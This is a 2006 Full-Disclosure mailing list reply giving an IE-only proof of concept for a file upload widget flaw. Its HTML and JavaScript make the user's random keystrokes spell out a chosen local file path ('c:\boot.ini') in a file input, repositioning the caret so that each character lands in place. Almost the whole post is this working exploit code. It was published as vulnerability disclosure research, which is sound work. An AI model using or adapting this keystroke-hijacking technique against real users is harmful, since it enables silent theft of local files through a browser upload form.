[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] file upload widgets in IE and Firefox have issues
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] file upload widgets in IE and Firefox have issues
- From: Bart van Arnhem <obliv@xxxxxxx>
- Date: Thu, 08 Jun 2006 18:29:21 +0200
Here is another proof of concept for IE only, it allows the characters
to be entered in a arbitrary order, since it repositions the caret to
make the characters drop in the right place.
Just open this HTML in IE and bash on the keyboard a bit.
- Bart
<html>
<head>
<script type="text/javascript">
var targetFile = "c:\\boot.ini";
window.onload = function ()
{
tempFilled = new Array(targetFile.length + 1).join("\x01");
tempDone = targetFile.toUpperCase();
document.getElementById("target").onkeyup = function ()
{ this.blur(); };
document.getElementById("target").onkeypress = function (e)
{
if (!e) e = window.event;
var pressed =
String.fromCharCode(e.keyCode).toUpperCase();
if ((origPos = tempDone.indexOf(pressed)) !== -1)
{
tempFilled = tempFilled.substr(0, origPos) +
pressed + tempFilled.substr(origPos + 1);
tempDone = tempDone.replace(pressed, "\x01");
var matches = tempFilled.substr(0,
origPos).match(/\x01/g);
tempPos = origPos - (matches == null ? 0 :
matches.length);
var range =
document.getElementById("target").createTextRange();
range.collapse(true);
range.move("character", tempPos);
range.select();
return true;
}
return false;
}
document.onkeydown = function () {
document.getElementById("target").focus() };
}
</script>
</head>
<body>
<form method="post" action="">
<input type="file" id="target" />
</form>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/